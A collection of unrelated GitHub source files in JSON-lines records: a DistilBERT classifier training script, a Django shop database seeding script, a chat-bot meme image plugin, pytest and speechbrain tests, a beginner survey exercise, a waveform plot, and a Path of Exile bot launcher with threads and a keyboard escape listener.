huggingface trainer usage guide: https://huggingface.co/docs/transformers/training#train\n# - Korean sentence-relation baseline using KoBERT: https://dacon.io/competitions/official/235875/codeshare/4520\n\n# In[7]:\n\n\nMODEL_NAME = 'distilbert-base-uncased'\n\ntokenizer = BertTokenizer.from_pretrained(MODEL_NAME)\n\nprint(len(df['category2'].unique()))\n\nmodel = AutoModelForSequenceClassification.from_pretrained(MODEL_NAME,\n num_labels=len(df['category2'].unique()),\n label2id=labels_dictionary,\n id2label=labels_dictionary_reverse)\n\n\n# In[1]:\n\n\nX = df['text']\ny = df['category2']\nclass_weights = (1 - (y.value_counts().sort_index() / len(df))).values\nclass_weights = torch.from_numpy(class_weights).float().to(device)\nclass_weights # weights to adjust for imbalanced classes\n\n\n# In[8]:\n\n\nX_train, X_valid = train_test_split(df, test_size=0.2, shuffle=True)\n\ntokenized_train = tokenizer(\n list(X_train.text),\n return_tensors=\"pt\",\n max_length=256,\n padding=True,\n truncation=True,\n add_special_tokens=True\n)\n\ntokenized_eval = tokenizer(\n list(X_valid.text),\n return_tensors=\"pt\",\n max_length=256,\n padding=True,\n truncation=True,\n add_special_tokens=True\n)\n\nprint(tokenized_train['input_ids'][0])\nprint(tokenizer.decode(tokenized_train['input_ids'][0]))\n\n\n# In[9]:\n\n\nclass BERTDataset(torch.utils.data.Dataset):\n def __init__(self, pair_dataset, label):\n self.pair_dataset = pair_dataset\n self.label = label\n\n def __getitem__(self, idx):\n item = {key: val[idx].clone().detach() for key, val in self.pair_dataset.items()}\n item['label'] = torch.tensor(self.label[idx])\n \n return item\n\n def __len__(self):\n return len(self.label)\n \ndef label_to_num(label):\n label_dict = labels_dictionary\n num_label = []\n\n for v in label:\n num_label.append(label_dict[v])\n \n return num_label\n\ntrain_label = label_to_num(X_train['category2'].values)\neval_label = label_to_num(X_valid['category2'].values)\n\n\n# In[10]:\n\n\ntrain_dataset = BERTDataset(tokenized_train, train_label)\neval_dataset = BERTDataset(tokenized_eval, eval_label)\n\nprint(train_dataset.__len__())\nprint(train_dataset.__getitem__(0))\nprint(tokenizer.decode(train_dataset.__getitem__(0)['input_ids']))\nprint(train_dataset.__getitem__(0)['label'])\nprint(tokenizer.decode(train_dataset.__getitem__(0)['label']))\n\n\n# In[11]:\n\n\nfrom torch import nn\nimport torch\n\nclass CustomTrainer(Trainer):\n def compute_loss(self, model, inputs, return_outputs=False):\n outputs = model(**inputs)\n logits = outputs.get(\"logits\")\n labels = inputs.get(\"labels\")\n loss_func = nn.CrossEntropyLoss(weight=class_weights)\n loss = loss_func(logits, labels)\n return (loss, outputs) if return_outputs else loss\n\n\n# In[12]:\n\n\nfrom sklearn.metrics import accuracy_score, precision_recall_fscore_support, roc_auc_score\n\ndef compute_metrics(pred):\n labels = pred.label_ids\n preds = pred.predictions.argmax(-1)\n precision, recall, f1, _ = precision_recall_fscore_support(labels, preds, average='weighted')\n return {\n 'f1': f1\n }\n\n\n# In[13]:\n\n\ntraining_args = TrainingArguments(\n output_dir='./result',\n num_train_epochs=10,\n learning_rate=2e-5,\n per_device_train_batch_size=32,\n per_device_eval_batch_size=32,\n warmup_steps=100,\n weight_decay=0.01,\n save_total_limit=5,\n optim=\"adamw_torch\",\n save_steps=100,\n evaluation_strategy='steps',\n eval_steps=100,\n logging_steps=64,\n load_best_model_at_end = True,\n fp16=True # supposedly makes training a bit faster??\n)\n\ntrainer = CustomTrainer(\n model=model,\n args=training_args,\n 
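 # CustomTrainer (defined above) only overrides compute_loss so the class
 # weights computed earlier flow into nn.CrossEntropyLoss; a quick worked
 # example of that weighting scheme: with label counts [900, 100] over
 # 1000 samples, class_weights = 1 - counts/total = [0.1, 0.9], so each
 # rare-class sample contributes nine times more to the loss.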
train_dataset=train_dataset,\n eval_dataset=eval_dataset,\n tokenizer=tokenizer,\n compute_metrics=compute_metrics,\n)\n\ntrainer.train()\nmodel.save_pretrained('./result/best_model')\n\n\n# In[14]:\n\n\ndf_test = pd.read_csv(test_path, encoding='utf-8')\ndf_test\n\n\n# In[16]:\n\n\ndevice = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')\n\nTokenizer_NAME = \"bert-base-uncased\"\ntokenizer = AutoTokenizer.from_pretrained(MODEL_NAME)\n\nMODEL_NAME = './result/checkpoint-4700'\nmodel = AutoModelForSequenceClassification.from_pretrained(\n MODEL_NAME,\n num_labels=len(df['category2'].unique()),\n label2id=labels_dictionary,\n id2label=labels_dictionary_reverse,\n)\n\n\n# In[17]:\n\n\ntrainer.evaluate()\n\n\n# In[18]:\n\n\ndf_test = pd.read_csv(test_path, encoding='utf-8')\ndf_test\n\n\n# In[19]:\n\n\nimport torch, gc\ngc.collect()\ntorch.cuda.empty_cache()\n\noutput_pred = []\noutput_prob = []\nmodel.eval()\ntxt_test = [tokenizer(_, return_tensors=\"pt\", max_length=256, truncation=True, padding=True) for _ in list(df_test['text'])]\nlogits_list = []\nfor i in tqdm(txt_test):\n with torch.no_grad():\n outputs = model(**i).logits\n logits = outputs[0]\n prob = F.softmax(logits, dim=-1).detach().cpu().numpy()\n logits = logits.detach().cpu().numpy()\n result = np.argmax(logits, axis=-1)\n\n output_pred.append(result)\n output_prob.append(prob)\n\n\n# In[ ]:\n\n\nanswers = []\nfor i in output_pred:\n answers.append(labels_dictionary_reverse[i])\nanswers\n\n\n# In[ ]:\n\n\ndf_test['category2'] = answers\ndf_test\n\n\n# In[ ]:\n\n\ndf_test.to_csv(submission_path+'submission_11.csv', index=False, columns=['id', 'category2'])\n\n","repo_name":"NewPlus/2022JBNUBigDataContest","sub_path":"problem1_distillBert.py","file_name":"problem1_distillBert.py","file_ext":"py","file_size_in_byte":7726,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"18283850497","text":"import itertools\nimport os, django, decimal\nimport random\n\nfrom django.utils import timezone\nfrom django.db.utils import IntegrityError\n\nos.environ.setdefault(\"DJANGO_SETTINGS_MODULE\", \"electronic_shop.settings\")\ndjango.setup()\n\nfrom django.db.models.functions.text import Ord\n\nfrom ProductApp.products import (\n phones,\n monitors,\n laptops,\n pcs,\n accesories,\n ssds,\n graphs,\n rams,\n pendrives,\n switches,\n motherboards,\n cpus,\n tvs,\n headphones,\n routers,\n)\nfrom django.core.files import File\nfrom ProductApp.models import *\nfrom ProductApp.products import *\nfrom Articles.models import ArticleComment\nfrom ShoppingCardApp.models import *\n\n\nproducts = [\n phones,\n monitors,\n laptops,\n pcs,\n accesories,\n ssds,\n graphs,\n rams,\n pendrives,\n switches,\n motherboards,\n cpus,\n tvs,\n headphones,\n routers,\n]\nfolders = [\n \"phones\",\n \"monitors\",\n \"laptops\",\n \"pcs\",\n \"accesories\",\n \"ssds\",\n \"graphs\",\n \"rams\",\n \"pendrives\",\n \"switches\",\n \"motherboards\",\n \"cpus\",\n \"tvs\",\n \"headphones\",\n \"routers\",\n]\n\n\nmodel = {\n \"phones\": lambda **item: Phones.objects.get_or_create(**item),\n \"monitors\": lambda **item: Monitors.objects.get_or_create(**item),\n \"laptops\": lambda **item: Laptops.objects.get_or_create(**item),\n \"pcs\": lambda **item: Pc.objects.get_or_create(**item),\n \"accesories\": lambda **item: AccesoriesForLaptops.objects.get_or_create(**item),\n \"ssds\": lambda **item: Ssd.objects.get_or_create(**item),\n \"graphs\": lambda **item: Graphs.objects.get_or_create(**item),\n 
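 # Each entry in this dict maps a sample-data folder name to a
 # get_or_create factory for the matching Django model, so the seeding
 # loop further below stays generic: model[folder](**item) dispatches to
 # the right table and returns the usual (instance, created) tuple.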
\"rams\": lambda **item: Ram.objects.get_or_create(**item),\n \"pendrives\": lambda **item: Pendrives.objects.get_or_create(**item),\n \"switches\": lambda **item: Switches.objects.get_or_create(**item),\n \"motherboards\": lambda **item: Motherboard.objects.get_or_create(**item),\n \"cpus\": lambda **item: Cpu.objects.get_or_create(**item),\n \"tvs\": lambda **item: Tv.objects.get_or_create(**item),\n \"headphones\": lambda **item: Headphones.objects.get_or_create(**item),\n \"routers\": lambda **item: Routers.objects.get_or_create(**item),\n}\n\n\n\"\"\" Add products to daabase \"\"\"\n\nfor prod, folder in zip(products, folders):\n for product, fold in zip(prod, itertools.repeat(folder)):\n PATH = rf\"electronic_shop/static/images/products/{fold}/\"\n try:\n itt, _ = model[fold](**product)\n except IntegrityError:\n pass\n\n try:\n itt.main_photo.save(\n product[\"main_photo\"], File(open(PATH + product[\"main_photo\"], \"rb\"))\n )\n except:\n pass\n\n try:\n itt.second_photo.save(\n product[\"second_photo\"],\n File(open(PATH + product[\"second_photo\"], \"rb\")),\n )\n except:\n pass\n try:\n itt.third_photo.save(\n product[\"third_photo\"], File(open(PATH + product[\"third_photo\"], \"rb\"))\n )\n except:\n pass\n print(f'Product {product[\"name\"]} created')\n\n\"\"\" Choose random products and change \"product of the day\" field. Adding promotion \"\"\"\nproducts = list(MainProductDatabase.objects.all())\n\n# Reset field\nfor product in products:\n product.selected = False\n product.save()\n\nselected = [products[random.randint(0, len(products) - 1)] for _ in range(0, 8)]\n\n# Add selected and change price\nfor product in selected:\n product.selected = True\n product.promotion = product.price * round(decimal.Decimal(0.7), 2)\n product.save()\n\n\n\"\"\" Choose one product as a product of the day \"\"\"\nproduct_of_the_day = products[random.randint(0, len(products) - 1)]\n\nproduct_of_the_day.promotion = product_of_the_day.price * round(decimal.Decimal(0.6), 2)\nproduct_of_the_day.product_of_the_day = True\nproduct_of_the_day.product_of_the_day_added = timezone.now()\nproduct_of_the_day.save()\n\n\n\"\"\" Add 3 blog posts \"\"\"\n\nfrom Articles.models import LandingPageArticles\nfrom django.contrib.auth import get_user_model\n\n\nuser, created = get_user_model().objects.get_or_create(email=\"employee@account.com\")\n\nif created:\n user.set_password(\"employee\")\n user.save()\n\narticle = LandingPageArticles.objects.create(\n title=\"The standard Lorem Ipsum passage, used since the 1500s\",\n tag_one=\"Phones\",\n tag_two=\"Laptops\",\n tag_three=\"Smartphones\",\n alt_short_descript=\"The standard Lorem Ipsum passage, used since the 1500s\",\n posted=timezone.now(),\n owner=user,\n content_wysiwyg=\"Contrary to popular belief, Lorem Ipsum is not simply random text. 
It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old.\",\n short_description=\"The standard Lorem Ipsum passage, used since the 1500s\",\n)\n\narticle.img.save(\n \"dqwd.png\",\n File(open(r\"electronic_shop/static/images/showcase/low res/dqwd.png\", \"rb\")),\n)\n\n\"\"\"Comment section\"\"\"\n\nfirst_comment = ArticleComment.objects.create(\n article=article,\n comment=\"Gdzie jest slonko kiedy spi?\",\n email=\"test@gmail.com\",\n name=\"Test Testowy\",\n checked=True,\n)\n\nfirst_comment_answer = ArticleComment.objects.create(\n article=article,\n comment=\"Dokąd w nocy tupta jeż?\",\n email=\"test@gmail.com\",\n name=\"Test Testowy\",\n checked=True,\n parent=first_comment,\n)\n\nfirst_comment_answer_child = ArticleComment.objects.create(\n article=article,\n comment=\"Avada Kedavra\",\n email=\"test@gmail.com\",\n name=\"Voldemort\",\n checked=True,\n parent=first_comment_answer,\n)\n\nfirst_comment_answer_child = ArticleComment.objects.create(\n article=article,\n comment=\"Auuuu\",\n email=\"test@gmail.com\",\n name=\"101 Dalmatians\",\n checked=True,\n parent=first_comment,\n)\n\nfirst_comment_answer_child = ArticleComment.objects.create(\n article=article,\n comment=\"Stay in wonderland\",\n email=\"test@gmail.com\",\n name=\"Morfeusz\",\n checked=True,\n parent=first_comment_answer,\n)\n\narticle = LandingPageArticles.objects.create(\n title=\"The standard Lorem Ipsum passage, used since the 1500s\",\n tag_one=\"TV\",\n tag_two=\"SSD\",\n tag_three=\"Pendrives\",\n alt_short_descript=\"The standard Lorem Ipsum passage, used since the 1500s\",\n posted=timezone.now(),\n owner=user,\n content_wysiwyg=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old.\",\n short_description=\"The standard Lorem Ipsum passage, used since the 1500s\",\n)\n\narticle.img.save(\n \"koparka.jpg\",\n File(open(r\"electronic_shop/static/images/showcase/low res/koparka.jpg\", \"rb\")),\n)\n\n\n\"\"\"Comment section\"\"\"\n\nfirst_comment = ArticleComment.objects.create(\n article=article,\n comment=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old.\",\n email=\"test@gmail.com\",\n name=\"Where does it come from?\",\n checked=True,\n)\n\nfirst_comment_answer = ArticleComment.objects.create(\n article=article,\n comment=\"Sed ut perspiciatis unde omnis iste natus error sit voluptatem accusantium doloremque laudantium, totam rem aperiam, eaque ipsa quae ab illo inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo.\",\n email=\"test@gmail.com\",\n name=\"H. Rackham\",\n checked=True,\n parent=first_comment,\n)\n\nfirst_comment_answer_child = ArticleComment.objects.create(\n article=article,\n comment=\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Cras quam velit, ultrices eget consequat at, molestie ut diam. Nunc ultricies massa eget nunc dapibus congue. In molestie orci at risus rutrum, vel scelerisque sapien malesuada. Aliquam vitae ullamcorper elit, et consequat nisi. Cras sed pharetra dui, eget blandit odio. Etiam in commodo lacus. In congue nisi mauris, eu hendrerit elit auctor sit amet. 
Donec tincidunt tellus ac neque iaculis, sed interdum dui gravida.\",\n email=\"test@gmail.com\",\n name=\"Lorem Ipsum\",\n checked=True,\n parent=first_comment_answer,\n)\n\nfirst_comment_answer_child = ArticleComment.objects.create(\n article=article,\n comment=\"Pellentesque vitae lobortis quam, eu lobortis enim. Donec eget nisl lacinia, dapibus libero id, bibendum tellus. Quisque gravida dolor et purus elementum tempus.\",\n email=\"test@gmail.com\",\n name=\"Neque porro quisquam \",\n checked=True,\n parent=first_comment,\n)\n\nfirst_comment_answer_child = ArticleComment.objects.create(\n article=article,\n comment=\"Aliquam maximus tincidunt magna, vitae luctus tortor finibus eu. Sed ac massa turpis. Aliquam tristique sit amet dolor sed facilisis. Suspendisse commodo nunc sit amet scelerisque porta\",\n email=\"test@gmail.com\",\n name=\"Ut est justo\",\n checked=True,\n parent=first_comment_answer,\n)\n\nfirst_comment = ArticleComment.objects.create(\n article=article,\n comment=\"Vivamus quis maximus diam, at pulvinar mauris. Aliquam ante orci, ornare eget elit maximus, commodo hendrerit nulla. Maecenas faucibus nisi sapien, vel maximus turpis luctus a.\",\n email=\"test@gmail.com\",\n name=\"Aliquam ante orci\",\n checked=True,\n)\n\n\narticle = LandingPageArticles.objects.create(\n title=\"The standard Lorem Ipsum passage, used since the 1500s\",\n tag_one=\"TV\",\n tag_two=\"PC\",\n tag_three=\"Pendrives\",\n alt_short_descript=\"The standard Lorem Ipsum passage, used since the 1500s\",\n posted=timezone.now(),\n owner=user,\n content_wysiwyg=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old.\",\n short_description=\"The standard Lorem Ipsum passage, used since the 1500s\",\n)\n\narticle.img.save(\n \"pc2.jpg\",\n File(open(r\"electronic_shop/static/images/showcase/low res/pc2.jpg\", \"rb\")),\n)\n\n\n\"\"\" buy some products for employee account \"\"\"\n\n\ncustomer, created = Customer.objects.get_or_create(user=user)\n\nfor _ in range(1, 10):\n\n order = Order.objects.create(\n customer=customer,\n transaction_id=\"\",\n transaction_status=True,\n transaction_finished=timezone.now(),\n )\n\n for _ in range(1, 5):\n product_item = products[random.randint(0, len(products) - 1)]\n\n order_item = OrderItem.objects.create(\n order=order, quantity=random.randint(1, 10), product=product_item\n )\n\n try:\n review, created = Reviews.objects.get_or_create(\n product=order_item.product,\n review=\"Vivamus quis maximus diam, at pulvinar mauris. Aliquam ante orci, ornare eget elit maximus, commodo hendrerit nulla. Maecenas faucibus nisi sapien, vel maximus turpis luctus a.\",\n user=user,\n stars=random.randint(1, 6),\n checked_by_employer=True,\n )\n except IntegrityError:\n pass\n\n if created:\n review = created\n\n question = (\n Questions.objects.create(\n product=order_item.product,\n question=\"Gdzie jest słońce kiedy spi?\",\n name=\"Janko Muzykant\",\n checked_by_employer=True,\n employer_reply=\"A dokąd w nocy tupta jeż?\",\n ),\n )\n\n question = Questions.objects.create(\n product=order_item.product,\n question=\"Mr. 
Anderson, welcome back, we miss you\",\n name=\"Smith\",\n checked_by_employer=True,\n employer_reply=\"Im leaving right now.\",\n )\n\n\"\"\" create likes \"\"\"\n\nfor _ in range(1, 50):\n product_like = products[random.randint(0, len(products) - 1)].likes\n product_like.add(user)\n","repo_name":"LukaszRemkowicz/Electronic_Shop_Project","sub_path":"products_script.py","file_name":"products_script.py","file_ext":"py","file_size_in_byte":11729,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"33321168478","text":"from argparse import Namespace\nfrom pathlib import Path\nfrom typing import List\n\nfrom nonebot.adapters.onebot.v11 import Bot, MessageEvent, MessageSegment\nfrom nonebot.params import ShellCommandArgs\nfrom nonebot.rule import ArgumentParser\nfrom PIL import Image, ImageEnhance, ImageFilter\n\nfrom util import command, imutil, misc, textutil\nfrom util.user_aliases import AvatarGetter, DefaultType\n\nDIR = Path(__file__).resolve().parent\n\n\nparser = ArgumentParser(add_help=False)\nparser.add_argument(\"target\", nargs=\"?\", default=\"\", metavar=\"目标\", help=(\n \"可使用@、QQ号、昵称、群名片或图片链接(可传入动图)\"\n))\ngroup = parser.add_mutually_exclusive_group()\ngroup.add_argument(\n \"--webp\", \"-w\", action=\"store_const\", dest=\"format\", const=\"webp\", default=\"gif\",\n help=\"使用WebP而非GIF格式(如果传入动图)\"\n)\ngroup.add_argument(\n \"--png\", \"--apng\", \"-p\", action=\"store_const\", dest=\"format\", const=\"png\",\n help=\"使用APNG而非GIF格式(如果传入动图)\"\n)\nmatcher = (\n command.CommandBuilder(\"meme_pic.loading\", \"加载中\")\n .category(\"meme_pic\")\n .brief(\"[动]\")\n .shell(parser)\n .build()\n)\n@matcher.handle()\nasync def handler(bot: Bot, event: MessageEvent, args: Namespace = ShellCommandArgs()) -> None:\n async with AvatarGetter(bot, event) as g:\n target_task = g(args.target, DefaultType.TARGET, raw=True)\n\n def make() -> MessageSegment:\n target, _ = target_task.result()\n big = imutil.resize_width(target.convert(\"RGBA\"), 500)\n mask = Image.new(\"RGB\", big.size, (255, 255, 255))\n mask.paste(big, mask=big)\n mask = ImageEnhance.Brightness(mask).enhance(0.5)\n mask = mask.filter(ImageFilter.GaussianBlur(3))\n icon = Image.open(DIR / \"icon.png\")\n imutil.paste(mask, icon, (big.width // 2, big.height // 2), anchor=\"mm\")\n text1 = textutil.render(\"不出来\", \"sans\", 60)\n\n frames: List[Image.Image] = []\n for raw in imutil.frames(target):\n small = imutil.resize_width(raw.convert(\"RGBA\"), 100)\n text_h = max(small.height, text1.height)\n im = Image.new(\"RGB\", (big.width, big.height + text_h), (255, 255, 255))\n im.paste(mask)\n x = (im.width - small.width - text1.width) // 2\n y = big.height + text_h // 2\n im.paste(small, (x, y - small.height // 2), small)\n x += small.width\n im.paste(text1, (x, y - text1.height // 2), text1)\n frames.append(im)\n\n return imutil.to_segment(frames, target, afmt=args.format)\n\n await matcher.finish(await misc.to_thread(make))\n","repo_name":"su226/IdhagnBot","sub_path":"plugins/meme_pic/loading/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2505,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"52"} +{"seq_id":"12323509990","text":"import matplotlib.pyplot as plt\nimport librosa.display\n\nAUDIO_PATH = 'music/2019CDSF总决赛A组拉丁舞决赛斗牛现场用曲.mp3'\nmusic, sr = librosa.load(AUDIO_PATH)\n\nplt.figure(figsize=(14, 5))\nlibrosa.display.waveplot(music, 
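# librosa.display.waveplot draws the signal's amplitude envelope against
# time; note that waveplot was deprecated and removed in librosa 0.10,
# where librosa.display.waveshow(music, sr=sr) is the drop-in replacement.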
sr=sr)\n\nplt.show()","repo_name":"vvright/LearningPython","sub_path":"dancesport/paso_plt.py","file_name":"paso_plt.py","file_ext":"py","file_size_in_byte":252,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"29271045300","text":"import pytest\nimport os\nimport shutil\nimport time\nimport asyncer\nimport asyncio\nimport anyio\n\n\n@pytest.fixture\ndef anyio_backend():\n \"\"\"event loop backend は asyncio のみ対応。trioは対応しない。\"\"\"\n return \"asyncio\"\n\n\ndef get_file(src: str, mode: str = \"r\"):\n target = os.path.join(os.path.dirname(__file__), \"samples\", src)\n return open(target, mode)\n\n\n# @pytest.fixture(scope=\"module\", autouse=True)\n# @pytest.fixture(scope=\"function\", autouse=True)\nasync def clear_files():\n test_dir = os.path.join(os.path.dirname(__file__), \"dir_asgi\")\n\n for item in os.listdir(test_dir):\n target = os.path.join(test_dir, item)\n if os.path.isfile(target):\n print(f\"file {target}\")\n await asyncer.asyncify(os.unlink)(target)\n elif os.path.isdir(target):\n print(f\"dir {target}\")\n await asyncer.asyncify(shutil.rmtree)(target)\n\n while True:\n if await asyncer.asyncify(os.path.exists)(target):\n ...\n else:\n break\n","repo_name":"sasano8/object_storage_app","sub_path":"tests/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":1052,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"12039053334","text":"import pytest\n\n\ndef test_dependency_graph():\n from speechbrain.utils.depgraph import (\n DependencyGraph,\n CircularDependencyError,\n )\n\n dg = DependencyGraph()\n # a->b->c\n dg.add_edge(\"b\", \"c\")\n dg.add_edge(\"a\", \"b\")\n assert dg.is_valid()\n eval_order = [node.key for node in dg.get_evaluation_order()]\n assert eval_order == [\"c\", \"b\", \"a\"]\n dg = DependencyGraph()\n # a->b->c, a->c\n dg.add_edge(\"b\", \"c\")\n dg.add_edge(\"a\", \"b\")\n dg.add_edge(\"a\", \"c\")\n eval_order = [node.key for node in dg.get_evaluation_order()]\n assert eval_order == [\"c\", \"b\", \"a\"]\n dg = DependencyGraph()\n # a->b, a->c\n dg.add_edge(\"a\", \"b\")\n dg.add_edge(\"a\", \"c\")\n eval_order = [node.key for node in dg.get_evaluation_order()]\n assert eval_order == [\"c\", \"b\", \"a\"] or eval_order == [\"b\", \"c\", \"a\"]\n dg = DependencyGraph()\n # a->b, c->d\n dg.add_edge(\"a\", \"b\")\n dg.add_edge(\"c\", \"d\")\n eval_order = [node.key for node in dg.get_evaluation_order()]\n valid_orders = [\n [\"d\", \"c\", \"b\", \"a\"],\n [\"d\", \"b\", \"c\", \"a\"],\n [\"d\", \"b\", \"a\", \"c\"],\n [\"b\", \"a\", \"d\", \"c\"],\n [\"b\", \"d\", \"a\", \"c\"],\n [\"b\", \"d\", \"c\", \"a\"],\n ]\n assert eval_order in valid_orders\n dg = DependencyGraph()\n # a->b\n dg.add_node(\"a\")\n dg.add_node(\"b\")\n dg.add_edge(\"a\", \"b\")\n eval_order = [node.key for node in dg.get_evaluation_order()]\n assert eval_order == [\"b\", \"a\"]\n dg = DependencyGraph()\n # a->b->a Impossible!\n dg.add_edge(\"a\", \"b\")\n dg.add_edge(\"b\", \"a\")\n assert not dg.is_valid()\n with pytest.raises(CircularDependencyError):\n list(dg.get_evaluation_order())\n dg = DependencyGraph()\n # a->b with data\n # should use uuids\n a_key = dg.add_node(data=\"a\")\n assert a_key != \"a\"\n b_key = dg.add_node(data=\"b\")\n dg.add_edge(a_key, b_key)\n eval_order_data = [node.data for node in dg.get_evaluation_order()]\n assert eval_order_data == [\"b\", \"a\"]\n # Adding same key in edge (implicitly) and then explicitly is 
ok:\n dg = DependencyGraph()\n dg.add_edge(\"a\", \"b\")\n dg.add_node(\"a\")\n eval_order = [node.key for node in dg.get_evaluation_order()]\n assert eval_order == [\"b\", \"a\"]\n # But adding same key twice explicitly will not work:\n with pytest.raises(ValueError):\n dg.add_node(\"a\")\n","repo_name":"speechbrain/speechbrain","sub_path":"tests/unittests/test_dependency_graph.py","file_name":"test_dependency_graph.py","file_ext":"py","file_size_in_byte":2357,"program_lang":"python","lang":"en","doc_type":"code","stars":6855,"dataset":"github-code","pt":"52"} +{"seq_id":"22432981912","text":"# Exercício Python 69: Write a program that reads the age and sex of several people. After each person is\r\n# registered, the program must ask whether the user wants to continue. At the end, show:\r\n#\r\n# A) how many people are over 18 years old.\r\n# B) how many men were registered.\r\n# C) how many women are under 20 years old.\r\nfrom time import sleep\r\n\r\nage = age_18counter = man_counter = w_under20 = persons = 0\r\nsex = ' '\r\nwhile True:\r\n age = int(input('Enter the age: '))\r\n sex = str(input('Enter the gender of this person [M/F]: ')).strip()[0]\r\n while sex not in 'MmFf':\r\n sex = str(input('This sex does not exist!! Type again [M/F]: ')).strip()[0]\r\n persons += 1\r\n if age >= 18:\r\n age_18counter += 1\r\n if sex in 'Mm':\r\n man_counter += 1\r\n else:\r\n if age < 20:\r\n w_under20 += 1\r\n asw = str(input('Do you want to continue? [Y/N]: '))\r\n while asw not in 'YyNn':\r\n asw = str(input('This option does not exist!!\\nDo you want to continue? [Y/N]: ')).strip()[0]\r\n if asw in 'Yy':\r\n print('-=-' * 20)\r\n print('Creating new form...')\r\n print('-=-' * 20)\r\n sleep(4)\r\n elif asw in 'Nn':\r\n break\r\nprint('~' * 70)\r\nif persons > 1: # if there are 2 or more persons.\r\n print(f'From {persons} people registered.', end=' ')\r\n if age_18counter > 1: # Persons above 18 years.\r\n print(f'There are {age_18counter} persons above 18-years-old.')\r\n elif age_18counter == 1:\r\n print(f'There is one person above 18-years-old.')\r\n elif age_18counter < 1:\r\n print('There is no person above 18-years-old.')\r\n if man_counter > 1: # if there are 2 or more men registered.\r\n print(f'\\nThere are {man_counter} men registered', end=' ')\r\n elif man_counter < 1:\r\n print(f'\\nThere is no man registered', end=' ')\r\n elif man_counter == 1:\r\n print(f'\\nThere is one man registered', end=' ')\r\n if w_under20 > 1: # if there are 2 or more women under 20-years-old.\r\n print(f'and there are {w_under20} women under 20-years-old.')\r\n elif w_under20 < 1:\r\n print(f'and there is not woman under 20-years-old')\r\n elif w_under20 == 1:\r\n print(f'and there is one woman under 20-years-old.')\r\nelif persons == 1: # if there is one person.\r\n print(f'From a {persons} registered person.', end=' ')\r\n if age_18counter > 1: # Persons above 18 years\r\n print(f'There are {age_18counter} persons above 18-years-old.')\r\n elif age_18counter == 1:\r\n print(f'There is one person above 18-years-old.')\r\n elif age_18counter < 1:\r\n print('There is no person above 18-years-old.')\r\n if man_counter > 1: # if there are 2 or more men registered.\r\n print(f'\\nThere are {man_counter} men registered', end=' ')\r\n elif man_counter < 1:\r\n print(f'\\nThere is no man registered', end=' ')\r\n elif man_counter == 1:\r\n print(f'\\nThere is one man registered', end=' ')\r\n if w_under20 > 1: # if there are 2 or more women under 20-years-old.\r\n print(f'and there are {w_under20} 
women under 20-years-old.')\r\n elif w_under20 < 1:\r\n print(f'and there is not woman under 20-years-old')\r\n elif w_under20 == 1:\r\n print(f'and there is one woman under 20-years-old.')\r\nprint('~'*70)\r\n","repo_name":"NLeopy/Curso-em-video-python-world2","sub_path":"ex069-100%.py","file_name":"ex069-100%.py","file_ext":"py","file_size_in_byte":3318,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"11421604009","text":"import os\nimport sys\nsys.path.append(os.getcwd())\nimport threading\nimport PoeNeuronData\n#import PoeNeuronTextThread\n#import PoeNeuronFollowPlayerThread\nimport PoeNeuronMovementThread\nimport PoeNeuronObjectDetectionThread\nimport PoeNeuronFogThread\nimport tkinter\nimport pynput\n\n\ndef hook_keyboard(data):\n from pynput.keyboard import Key\n from pynput.keyboard import Listener\n\n\n def on_press(key):\n pass\n\n def on_release(key):\n try:\n if key.char == 'a' or key == Key.esc:\n data._escape = True\n except:\n return\n\n # Collect events until released\n with Listener(\n on_press=on_press,\n on_release=on_release) as listener:\n listener.join()\n \nif __name__ == \"__main__\":\n data = PoeNeuronData.PoeNeuronData()\n \"\"\"\n text_thread = threading.Thread(target=PoeNeuronTextThread.PoeNeuronTextThread, args=(data,))\n text_thread.setDaemon(True)\n text_thread.start()\n \"\"\"\n \n \n \"\"\"\n follow_player_thread = threading.Thread(target=PoeNeuronFollowPlayerThread.PoeNeuronFollowPlayerThread, args=(data,))\n follow_player_thread.setDaemon(True)\n follow_player_thread.start()\n \"\"\"\n \n movement_thread = threading.Thread(target=PoeNeuronMovementThread.PoeNeuronMovementThread, args=(data,))\n movement_thread.setDaemon(True)\n movement_thread.start()\n \n detection_thread = threading.Thread(target=PoeNeuronObjectDetectionThread.PoeNeuronObjectDetectionThread, args=(data,))\n detection_thread.setDaemon(True)\n detection_thread.start()\n \n fog_thread = threading.Thread(target=PoeNeuronFogThread.PoeNeuronFogThread, args=(data,))\n fog_thread.setDaemon(True)\n fog_thread.start()\n \n keyboard_thread = threading.Thread(target=hook_keyboard, args=(data,))\n keyboard_thread.setDaemon(True)\n keyboard_thread.start()\n \n \n \n \n root = tkinter.Tk()\n text_command = tkinter.StringVar()\n player_position_str = tkinter.StringVar()\n\n def update_display():\n text_command.set(data._text_command)\n \n if data._move_location_command:\n player_position_str.set(\"{} x {}\".format(data._move_location_command[0], data._move_location_command[1]))\n else:\n player_position_str.set(None)\n \n root.after(1000,update_display)\n root.update_idletasks()\n \n label1 = tkinter.Label(root, textvariable=text_command)\n label1.pack()\n \n label2 = tkinter.Label(root, textvariable=player_position_str)\n label2.pack()\n \n root.after(1000,update_display)\n \n root.mainloop()\n \n \n 